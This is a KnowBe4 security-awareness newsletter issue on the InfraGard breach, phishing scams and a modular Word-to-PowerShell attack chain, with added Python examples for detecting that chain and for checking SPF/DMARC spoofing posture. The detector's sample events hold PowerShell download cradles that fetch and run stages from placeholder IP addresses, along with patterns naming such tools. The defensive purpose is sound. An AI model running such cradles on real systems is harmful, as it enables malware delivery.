CyberheistNews Vol 12 #51 | December 20th, 2022
[Ughh] The FBI’s Trusted Threat Sharing ‘InfraGard’ Network Was Hacked
Investigative reporter Brian Krebs reported December 13, 2022, that “InfraGard, a program run by the U.S. Federal Bureau of Investigation (FBI) to build cyber and physical threat information sharing partnerships with the private sector, this week saw its database of contact information on more than 80,000 members go up for sale on an English-language cybercrime forum.
“Meanwhile, the hackers responsible are communicating directly with members through the InfraGard portal online — using a new account under the assumed identity of a financial industry CEO that was vetted by the FBI itself.”
Here is some more from the Krebs post:
“On Dec. 10, 2022, the relatively new cybercrime forum Breached featured a bombshell new sales thread: The user database for InfraGard, including names and contact information for tens of thousands of InfraGard members.
“The FBI’s InfraGard program is supposed to be a vetted Who’s Who of key people in private sector roles involving both cyber and physical security at companies that manage most of the nation’s critical infrastructures — including drinking water and power utilities, communications and financial services firms, transportation and manufacturing companies, healthcare providers, and nuclear energy firms.
“InfraGard connects critical infrastructure owners, operators, and stakeholders with the FBI to provide education, networking, and information-sharing on security threats and risks,” the FBI’s InfraGard fact sheet reads.
“In response to information shared by KrebsOnSecurity, the FBI said it is aware of a potential false account associated with the InfraGard Portal and that it is actively looking into the matter.
“This is an ongoing situation, and we are not able to provide any additional information at this time,” the FBI said in a written statement.
“KrebsOnSecurity contacted the seller of the InfraGard database, a Breached forum member who uses the handle “USDoD” and whose avatar is the seal of the U.S. Department of Defense.”
[New PhishER Feature] Turn the Tables on the Cybercriminals with PhishFlip
Cybercriminals are always coming up with new, devious phishing techniques to trick your users. PhishFlip is a new PhishER feature that allows you to respond in real time and turn the tables on these threat actors. With PhishFlip, you can now immediately “flip” a dangerous attack into an instant real-world training opportunity for your users.
Your users are likely already reporting potentially dangerous emails in some fashion within your organization. You can now combine your existing PhishRIP email quarantine capability with the new PhishFlip feature that automatically replaces active phishing threats with a new defanged look-alike back into your users’ mailbox.
The new PhishFlip feature is included in PhishER—yes you read that right, no extra cost— so now you can turn the tables on these threat actors and flip targeted phishing attacks into a simulated phishing test for all users. This new feature dramatically reduces data breach risk and the burden on your IT and InfoSec teams.
See how you can best manage your user-reported messages.
Join us TOMORROW, Wednesday, December 21, @ 2:00 PM (ET) for a live 30-minute demonstration of PhishER, the #1 Leader in the G2 Grid Report for SOAR Software. With PhishER you can:
- NEW! Automatically flip active phishing attacks into safe simulated phishing campaigns with PhishFlip. You can even replace active phishing emails with safe look-alikes in your user’s inbox.
- Easily search, find, and remove email threats with PhishRIP, PhishER’s email quarantine feature for Microsoft 365 and Google Workspace
- Cut through your Incident Response inbox noise and respond to the most dangerous threats more quickly
- Automate message prioritization by rules you set into one of three categories: Clean, Spam or Threat
- Easy integration with KnowBe4’s email add-in button, Phish Alert, or forwarding to a mailbox works too!
Find out how adding PhishER can be a huge time-saver for your Incident Response team!
Date/Time: TOMORROW, Wednesday, December 21, @ 2:00 PM (ET)
CISA Phishing Infographic Contains a Lot of Good Information
On December 8, the Cybersecurity & Infrastructure Security Agency (CISA) released a phishing infographic covering the data collected, lessons learned and recommendations drawn from the simulated phishing attacks CISA has run for organizations. It is an independent, unbiased infographic with a lot of good data and recommendations. If you and your organization follow the included recommendations, you will be better off.
Each finding and recommendation is linked with specific Cybersecurity Performance Goals (CPGs) from CISA’s larger 2022 Cross-Sector Cybersecurity Performance Goals. So, it is great to be able to go from an infographic recommendation to a more formal recommendation and report, all created by the U.S. government’s largest agency dedicated to protecting people and organizations against cyberthreats.
Here are some of the key findings and some related sources for more information.
A Master Class on IT Security: Roger Grimes Teaches Ransomware Mitigation
Cybercriminals have become deliberate about ransomware attacks, taking time to maximize the damage to your organization and their payoff. Protecting your network from this growing threat is more important than ever. And nobody knows this better than Roger A. Grimes, Data-Driven Defense Evangelist at KnowBe4.
With 30+ years of experience as a computer security consultant, instructor, and award-winning author, Roger has dedicated his life to making sure you’re prepared to defend against quickly-evolving IT security threats like ransomware.
Watch Roger in this thought-provoking, on-demand webinar to learn what you can do to prevent, detect, and mitigate ransomware.
In this session you’ll learn:
- How to detect ransomware programs, even those that are highly stealthy
- Official recommendations from the Cybersecurity & Infrastructure Security Agency (CISA)
- The policies, technical controls, and education you need to stop ransomware in its tracks
- Why a good backup (even an offline backup) no longer saves you from ransomware
You can learn how to identify and stop these attacks before they wreak havoc on your network.
New Modular Attack Chain Found That Allows Attackers to Change Payloads Mid-Breach
We’ve long known developers of cyberattacks to be crafty and focus a lot of energy on obfuscation, but a new attack can shift gears midstream, delivering just the right malware.
If you travel enough by plane, eventually you have a very good idea of what can go wrong en route and plan accordingly, packing the things you may need (e.g., battery pack, charging cable, pillow, headphones). It’s just human nature: you know the outcome you want, you are aware of the variables, and you act proactively to make a positive outcome as likely as possible.
The attack that security analysts at HP Wolf Security describe in their Q3 Threat Insights Report is sophisticated in exactly that way. It feels as though these attackers have been through this before and have taken precautions so they can change the focus of an attack based on what they encounter in a victim organization.
According to the report, the attack starts with a simple malicious Word doc, but quickly turns into a complex mix of PowerShell scripts designed to facilitate the downloading of components from different remote web servers used throughout the campaign, allowing attackers to change out payloads easily mid-campaign or even mid-attack.
This modular approach empowers initial access brokers to use the same attack strategy, but install a RAT for one client, ransomware for another, and Cobalt Strike Beacon for yet another. This is dangerous territory, when threat actors have “options.” It’s all the more reason we need to make sure that their initial attack – a Word doc sent as an attachment – is never opened; something taught to users through frequent security awareness training.
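The chain described above (a Word document that hands off to PowerShell, which pulls stages from several remote web servers) is what endpoint process-creation telemetry is good at catching, whatever the final payload turns out to be. The following is an added detection example written for this newsletter; it is not code from HP Wolf Security or KnowBe4. It takes Sysmon-style process-creation events (the field names ParentImage, Image, CommandLine and Computer are assumed, and the events themselves are constructed), keeps the ones where an Office application spawned a script host, decodes any -EncodedCommand payload so the real command is inspected, and scores the result for download cradles and the distinct remote hosts it contacts.

```python
"""Flag Office-spawned script hosts that fetch stages from remote web servers.

Added detection example for this newsletter; not code from HP Wolf Security or
KnowBe4. Field names follow Sysmon process-creation events (Image, ParentImage,
CommandLine, Computer) and the events below are constructed, not real telemetry.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Indicator name -> pattern, searched over the command line plus any decoded -EncodedCommand.
CRADLE_PATTERNS = [
    ("download", re.compile(
        r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
        r"|net\.webclient|start-bitstransfer|bitsadmin", re.I)),
    ("in-memory execution", re.compile(r"invoke-expression|\biex\b", re.I)),
    ("hidden/bypass flags", re.compile(
        r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|executionpolicy\s+bypass", re.I)),
]
URL_RE = re.compile(r"https?://[^\s'\"`;)]+", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script).
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _severity(indicators):
    # Fetching code and running it in memory (or hiding it in base64) is the cradle proper.
    if "download" in indicators and ("in-memory execution" in indicators or "encoded command" in indicators):
        return "high"
    if indicators:
        return "medium"
    return "low"  # an Office app spawning a script host is suspicious on its own


def analyze_event(event):
    """Return an alert dict for an Office-app -> script-host spawn, else None."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    child = event["Image"].rsplit("\\", 1)[-1].lower()
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    indicators = [name for name, rx in CRADLE_PATTERNS if rx.search(text)]
    if decoded is not None:
        indicators.append("encoded command")
    # Distinct web servers contacted: the modular chain fans out to several of them.
    hosts = sorted({url.split("/")[2].lower() for url in URL_RE.findall(text)})
    return {"computer": event["Computer"], "parent": parent, "child": child,
            "indicators": indicators, "remote_hosts": hosts, "severity": _severity(indicators)}


def detect(events):
    """Run analyze_event over a sequence of events; return the alerts in input order."""
    return [alert for alert in (analyze_event(e) for e in events) if alert]


# Constructed sample events (addresses are from documentation ranges, not real servers).
_STAGE2 = ("$u='http://198.51.100.7/mod/a.dll';$v='http://203.0.113.10/mod/b.dll';"
           "(New-Object Net.WebClient).DownloadFile($u,'a.dll')")
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Computer": "WS01", "ParentImage": WORD, "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.10/stage1.ps1')\""},
    {"Computer": "WS02", "ParentImage": WORD, "Image": PS,
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"Computer": "WS03", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},  # admin use, no Office parent
    {"Computer": "WS04", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": 'cmd.exe /c "echo macro ran"'},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['computer']}: {alert['parent']} -> {alert['child']}"
              f" indicators={alert['indicators']} hosts={alert['remote_hosts']}")
```

The point of decoding before matching is that the second event's command line contains no URL and no cradle keyword at all; the two servers and the DownloadFile call only appear once the base64 is turned back into script. Any rule that inspects the raw command line would rate it the same as the harmless fourth event.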
Can You Be Spoofed?
Are you aware that one of the first things hackers try is to see if they can spoof the email address of someone in your own domain?
Now they can launch a “CEO fraud” spear phishing attack on your organization, and that type of attack is very hard to defend against, unless your users are highly “security awareness” trained.
KnowBe4 can help you find out if this is the case with our free Domain Spoof Test. It’s quick, easy and often a shocking discovery.
Find out now whether your email server is configured correctly; many are not!
- This is a simple, non-intrusive “pass/fail” test.
- We will send a spoofed email “from you to you”.
- If it makes it through into your inbox, you know you have a problem.
- You’ll know within 48 hours!
Try to Spoof Me!
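Whether a domain is “configured correctly” in this sense comes down mostly to the SPF and DMARC records it publishes in DNS. The following is an added example for this newsletter, not KnowBe4’s Domain Spoof Test: given a domain’s SPF and DMARC TXT records (the sample records are constructed; nothing is looked up), it reports whether a message carrying that domain in its From: header would be delivered by a receiver that follows the standards, and why. It also surfaces the caveat practitioners most often miss: a strict SPF record on its own does not stop header spoofing, because SPF checks the envelope sender and only DMARC ties that result to the From: address the user sees.

```python
"""Judge whether a domain's SPF and DMARC records let receivers reject mail that
spoofs it.

Added example for this newsletter; it is not KnowBe4's Domain Spoof Test and it
performs no DNS queries: records are passed in, and the samples below are
constructed. To use real data, fetch the TXT records of <domain> and _dmarc.<domain>.
"""
import re

# SPF terms that cost a DNS lookup; RFC 7208 allows at most 10 per evaluation.
_LOOKUP_TERM = re.compile(
    r"^(?:include:\S+|exists:\S+|redirect=\S+|ptr(?::\S+)?|a(?:[:/]\S+)?|mx(?:[:/]\S+)?)$")
_ALL_TERM = re.compile(r"^([+\-~?]?)all$")


def parse_spf(record):
    """Return (qualifier_of_all, dns_lookup_count), or None if the record is missing/invalid.

    qualifier is '-', '~', '?', '+', or None when the record has no 'all' term."""
    if not record or not record.lower().startswith("v=spf1"):
        return None
    qualifier, lookups = None, 0
    for term in record.lower().split()[1:]:
        m = _ALL_TERM.match(term)
        if m:
            qualifier = m.group(1) or "+"  # a bare 'all' means +all
            continue
        if _LOOKUP_TERM.match(term.lstrip("+-~?")):
            lookups += 1
    return qualifier, lookups


def parse_dmarc(record):
    """Return DMARC tags as a dict with lower-case keys, or None if missing/invalid."""
    if not record or not record.lower().startswith("v=dmarc1"):
        return None
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_spoof_posture(spf_record, dmarc_record):
    """Return (spoofable, findings).

    spoofable is True when a message with this domain in its From: header would
    still be delivered by a receiver that applies SPF and DMARC as specified."""
    findings = []
    spf = parse_spf(spf_record)
    spf_hard = False
    if spf is None:
        findings.append("no valid SPF record")
    else:
        qualifier, lookups = spf
        if lookups > 10:
            findings.append(f"SPF needs {lookups} DNS lookups (limit 10): evaluates to permerror")
        elif qualifier == "-":
            spf_hard = True
        elif qualifier == "~":
            findings.append("SPF ends in ~all (softfail): receivers usually deliver anyway")
        elif qualifier is None:
            findings.append("SPF has no 'all' term: unlisted senders get a neutral result")
        else:
            findings.append(f"SPF ends in {qualifier}all: any host may send as this domain")

    dmarc = parse_dmarc(dmarc_record)
    enforced = False
    if dmarc is None:
        findings.append("no DMARC record: SPF/DKIM results are never tied to the From: header")
    else:
        policy = dmarc.get("p", "none").lower()
        pct = int(dmarc.get("pct", "100"))
        if policy in ("quarantine", "reject") and pct == 100:
            enforced = True
        elif policy in ("quarantine", "reject"):
            findings.append(f"DMARC p={policy} but pct={pct}: {100 - pct}% of failing mail is delivered")
        else:
            findings.append("DMARC p=none: monitoring only, failing mail is delivered")

    # SPF is evaluated on the envelope sender (MAIL FROM). A spoofer can use any
    # envelope that passes and still forge the From: header; only DMARC checks
    # that the passing identity aligns with From:.
    if spf_hard and not enforced:
        findings.append("SPF -all alone does not protect the visible From: header")
    return not enforced, findings


# Constructed sample records; .example names are reserved and carry no real DNS data.
SAMPLES = {
    "hardened.example": ("v=spf1 ip4:192.0.2.0/24 include:_spf.mailhost.example -all",
                         "v=DMARC1; p=reject; rua=mailto:dmarc@hardened.example"),
    "softfail.example": ("v=spf1 mx ~all", "v=DMARC1; p=none; rua=mailto:dmarc@softfail.example"),
    "spf-only.example": ("v=spf1 ip4:198.51.100.10 -all", None),
    "overlimit.example": ("v=spf1 " + " ".join(f"include:svc{i}.example" for i in range(11)) + " -all",
                          "v=DMARC1; p=reject"),
    "nothing.example": (None, None),
}

if __name__ == "__main__":
    for domain, (spf_txt, dmarc_txt) in SAMPLES.items():
        spoofable, findings = assess_spoof_posture(spf_txt, dmarc_txt)
        print(f"{domain}: {'SPOOFABLE' if spoofable else 'protected'}")
        for finding in findings:
            print("  -", finding)
```

To check a real domain, pull the two TXT records (for example `dig +short TXT example.com` and `dig +short TXT _dmarc.example.com`) and pass them to `assess_spoof_posture`. The “spf-only” sample is the one worth noticing: a hard-fail SPF record with no DMARC policy still lets a “from you to you” message through, which is exactly what the test above would reveal.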
Let’s stay safe out there.
Stu Sjouwerman, SACP
Founder and CEO
PS: [SCARY] Effective, fast, and unrecoverable: Wiper malware is popping up everywhere.
PPS: [What Is CaaS?] 6 IBM cybersecurity predictions for 2023: Ransomware and CaaS will spike.
Quotes of the Week
“If there is to be reconciliation, first there must be truth.”
– Timothy B. Tyson – American Author
“Logic will get you from A to B. Imagination will take you everywhere.”
– Albert Einstein – Physicist
You can read CyberheistNews online at our Blog
Utility Bill Phishbait
An SMS phishing (smishing) campaign is impersonating utility providers in the U.S., Cybernews reports. Researchers at Enea AdaptiveMobile Security spotted the campaign, which lures recipients with offers to save money. The text messages contain offers related to gas prices, electricity bills, concert tickets and car insurance policies.
If a user clicks the link, they’ll be taken to a website designed to steal their personal and financial information. “[T]hese attackers know their target’s weak spot, and have constructed a special, ‘too good to miss’ offer to hook the victim,” the researchers write. “Once the user has opened the URL in the message and engages with the website, the risk of information theft is imminent. This could mean the user’s Social Security Number, or their credit/debit card PIN, for example.”
Another Deceptive Advance Fee Twitter Scam
Scammers continue to take advantage of headlines surrounding Elon Musk’s acquisition of Twitter. Researchers at Trend Micro have observed a new scam circulating on Twitter, in which attackers use fake tweets from Musk to push crypto scams. The phony tweets state, “I decided to randomly choose 1000 of my new followers, who can participate to the latest crypto giveaway.”
“Twitter and new owner Elon Musk have been everywhere in the news lately — and scammers have been using the trending publicity to push more crypto-related scams via Twitter,” Trend Micro says. “The latest is the ‘Freedom Giveaway’ scam.
“Twitter users who follow Elon Musk (and related accounts like Tesla and SpaceX) are the target. Would-be victims are added to a ‘Deal of the Year’ list that randomly targets users, with links to malicious websites that are supposedly offering great deals and giveaways.”
These types of scams are easy to recognize once you know what to look for. New-school security awareness training can give your employees a healthy sense of suspicion so they can avoid falling for these types of scams.
What KnowBe4 Customers Say
Found this in my inbox, unsolicited:
“Mr. Sjouwerman, I wanted to congratulate you on having such a fantastic employee, Megan K., at KnowBe4. A couple weeks ago Megan helped me through some processes. She had just taken over for our previous account rep.
“Megan was very knowledgeable, accommodating, and friendly. She answered all of my questions and was a pleasure to speak with. I look forward to her upbeat attitude, and friendly spirit next time I speak with her. I wanted to let you know.”
– S.J., Systems Administrator
“Good morning and happy Friday, Stu! I appreciate you reaching out to see how we’re doing so far. Our rollout of KnowBe4 has been smooth to start! Our representative, Brandon O., has been extremely helpful with our setup and always answers our questions with valuable information.
“Something that I thought was extremely helpful was the security policy template provided in the ASAP section of the web portal. It saved a lot of time to review it and make tweaks rather than creating a whole new one from scratch.
“Both HR and our Safety & Security teams liked how thorough it was. PS, I still reached out to Brandon to confirm it was you before responding, ha-ha. It’s not often you get to correspond with the founder and CEO of the service you’re using! Thank you for reaching out.”
– M.W., IT Coordinator